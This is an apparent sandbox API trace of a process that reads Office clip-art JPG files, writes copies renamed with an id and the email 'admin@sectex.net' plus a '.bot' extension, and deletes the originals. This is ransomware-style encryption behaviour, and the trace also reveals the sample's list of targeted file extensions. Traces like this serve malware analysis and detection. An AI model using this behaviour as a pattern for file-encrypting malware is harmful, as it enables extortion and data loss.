	[0152.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.502] GetLastError () returned 0x0
	[0152.502] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xc53a, lpOverlapped=0x0) returned 1
	[0152.504] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xc540, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xc540, lpOverlapped=0x0) returned 1
	[0152.506] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.506] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.506] SetEndOfFile (hFile=0x31c) returned 1
	[0152.506] CloseHandle (hObject=0x31c) returned 1
	[0152.506] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.506] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.509] CloseHandle (hObject=0x3e8) returned 1
	[0152.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.510] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg")) returned 1
	[0152.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.510] lstrlenW (lpString=".doc") returned 4
	[0152.511] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.511] lstrlenW (lpString=".docx") returned 5
	[0152.511] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0152.511] lstrlenW (lpString=".pdf") returned 4
	[0152.511] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.511] lstrlenW (lpString=".xls") returned 4
	[0152.511] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.511] lstrlenW (lpString=".xlsx") returned 5
	[0152.511] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0152.511] lstrlenW (lpString=".ppt") returned 4
	[0152.511] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.511] lstrlenW (lpString=".zip") returned 4
	[0152.511] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.511] lstrlenW (lpString=".rar") returned 4
	[0152.511] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.511] lstrlenW (lpString=".bz2") returned 4
	[0152.511] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.511] lstrlenW (lpString=".7z") returned 3
	[0152.511] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.511] lstrlenW (lpString=".dbf") returned 4
	[0152.511] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.511] lstrlenW (lpString=".1cd") returned 4
	[0152.511] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.511] lstrlenW (lpString=".jpg") returned 4
	[0152.511] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.512] lstrlenW (lpString=".doc") returned 4
	[0152.512] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.512] lstrlenW (lpString=".docx") returned 5
	[0152.512] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0152.512] lstrlenW (lpString=".pdf") returned 4
	[0152.512] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.512] lstrlenW (lpString=".xls") returned 4
	[0152.512] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.512] lstrlenW (lpString=".xlsx") returned 5
	[0152.512] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0152.512] lstrlenW (lpString=".ppt") returned 4
	[0152.512] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.512] lstrlenW (lpString=".zip") returned 4
	[0152.512] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.512] lstrlenW (lpString=".rar") returned 4
	[0152.512] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.512] lstrlenW (lpString=".bz2") returned 4
	[0152.512] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.512] lstrlenW (lpString=".7z") returned 3
	[0152.512] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.512] lstrlenW (lpString=".dbf") returned 4
	[0152.512] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.512] lstrlenW (lpString=".1cd") returned 4
	[0152.512] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63
	[0152.512] lstrlenW (lpString=".jpg") returned 4
	[0152.512] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.513] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.513] lstrlenW (lpString="J0099166.JPG") returned 12
	[0152.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.514] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=64767) returned 1
	[0152.514] CloseHandle (hObject=0x3e8) returned 1
	[0152.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg")) returned 0x20
	[0152.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.514] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.514] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.515] GetLastError () returned 0x0
	[0152.515] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xfcff, lpOverlapped=0x0) returned 1
	[0152.518] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xfd00, lpOverlapped=0x0) returned 1
	[0152.520] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.520] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.520] SetEndOfFile (hFile=0x31c) returned 1
	[0152.520] CloseHandle (hObject=0x31c) returned 1
	[0152.520] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.520] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.523] CloseHandle (hObject=0x3e8) returned 1
	[0152.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.524] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg")) returned 1
	[0152.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.524] lstrlenW (lpString=".doc") returned 4
	[0152.524] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.524] lstrlenW (lpString=".docx") returned 5
	[0152.524] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0152.524] lstrlenW (lpString=".pdf") returned 4
	[0152.524] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.524] lstrlenW (lpString=".xls") returned 4
	[0152.524] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.524] lstrlenW (lpString=".xlsx") returned 5
	[0152.524] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0152.525] lstrlenW (lpString=".ppt") returned 4
	[0152.525] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString=".zip") returned 4
	[0152.525] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.525] lstrlenW (lpString=".rar") returned 4
	[0152.525] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.525] lstrlenW (lpString=".bz2") returned 4
	[0152.525] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.525] lstrlenW (lpString=".7z") returned 3
	[0152.525] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString=".dbf") returned 4
	[0152.525] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString=".1cd") returned 4
	[0152.525] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString=".jpg") returned 4
	[0152.525] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.525] lstrlenW (lpString=".doc") returned 4
	[0152.525] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.525] lstrlenW (lpString=".docx") returned 5
	[0152.525] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0152.525] lstrlenW (lpString=".pdf") returned 4
	[0152.525] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.525] lstrlenW (lpString=".xls") returned 4
	[0152.525] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.526] lstrlenW (lpString=".xlsx") returned 5
	[0152.526] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0152.526] lstrlenW (lpString=".ppt") returned 4
	[0152.526] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.526] lstrlenW (lpString=".zip") returned 4
	[0152.526] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.526] lstrlenW (lpString=".rar") returned 4
	[0152.526] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.526] lstrlenW (lpString=".bz2") returned 4
	[0152.526] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.526] lstrlenW (lpString=".7z") returned 3
	[0152.526] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.526] lstrlenW (lpString=".dbf") returned 4
	[0152.526] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.526] lstrlenW (lpString=".1cd") returned 4
	[0152.526] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned 63
	[0152.526] lstrlenW (lpString=".jpg") returned 4
	[0152.526] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.526] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.526] lstrlenW (lpString="J0099167.JPG") returned 12
	[0152.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.527] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=43949) returned 1
	[0152.527] CloseHandle (hObject=0x3e8) returned 1
	[0152.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg")) returned 0x20
	[0152.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.527] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.528] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.529] GetLastError () returned 0x0
	[0152.529] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xabad, lpOverlapped=0x0) returned 1
	[0152.531] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xabb0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xabb0, lpOverlapped=0x0) returned 1
	[0152.532] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.532] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.533] SetEndOfFile (hFile=0x31c) returned 1
	[0152.533] CloseHandle (hObject=0x31c) returned 1
	[0152.533] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.533] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.535] CloseHandle (hObject=0x3e8) returned 1
	[0152.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.536] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg")) returned 1
	[0152.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.536] lstrlenW (lpString=".doc") returned 4
	[0152.536] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.536] lstrlenW (lpString=".docx") returned 5
	[0152.536] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0152.536] lstrlenW (lpString=".pdf") returned 4
	[0152.536] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.536] lstrlenW (lpString=".xls") returned 4
	[0152.536] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.536] lstrlenW (lpString=".xlsx") returned 5
	[0152.537] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0152.537] lstrlenW (lpString=".ppt") returned 4
	[0152.537] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString=".zip") returned 4
	[0152.537] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.537] lstrlenW (lpString=".rar") returned 4
	[0152.537] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.537] lstrlenW (lpString=".bz2") returned 4
	[0152.537] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.537] lstrlenW (lpString=".7z") returned 3
	[0152.537] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString=".dbf") returned 4
	[0152.537] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString=".1cd") returned 4
	[0152.537] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString=".jpg") returned 4
	[0152.537] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.537] lstrlenW (lpString=".doc") returned 4
	[0152.537] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.537] lstrlenW (lpString=".docx") returned 5
	[0152.537] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0152.537] lstrlenW (lpString=".pdf") returned 4
	[0152.537] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.537] lstrlenW (lpString=".xls") returned 4
	[0152.537] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.538] lstrlenW (lpString=".xlsx") returned 5
	[0152.538] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0152.538] lstrlenW (lpString=".ppt") returned 4
	[0152.538] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.538] lstrlenW (lpString=".zip") returned 4
	[0152.538] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.538] lstrlenW (lpString=".rar") returned 4
	[0152.538] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.538] lstrlenW (lpString=".bz2") returned 4
	[0152.538] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.538] lstrlenW (lpString=".7z") returned 3
	[0152.538] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.538] lstrlenW (lpString=".dbf") returned 4
	[0152.538] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.538] lstrlenW (lpString=".1cd") returned 4
	[0152.538] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63
	[0152.538] lstrlenW (lpString=".jpg") returned 4
	[0152.538] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.538] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.538] lstrlenW (lpString="J0099168.JPG") returned 12
	[0152.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.539] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=20179) returned 1
	[0152.539] CloseHandle (hObject=0x3e8) returned 1
	[0152.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg")) returned 0x20
	[0152.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.539] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.540] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
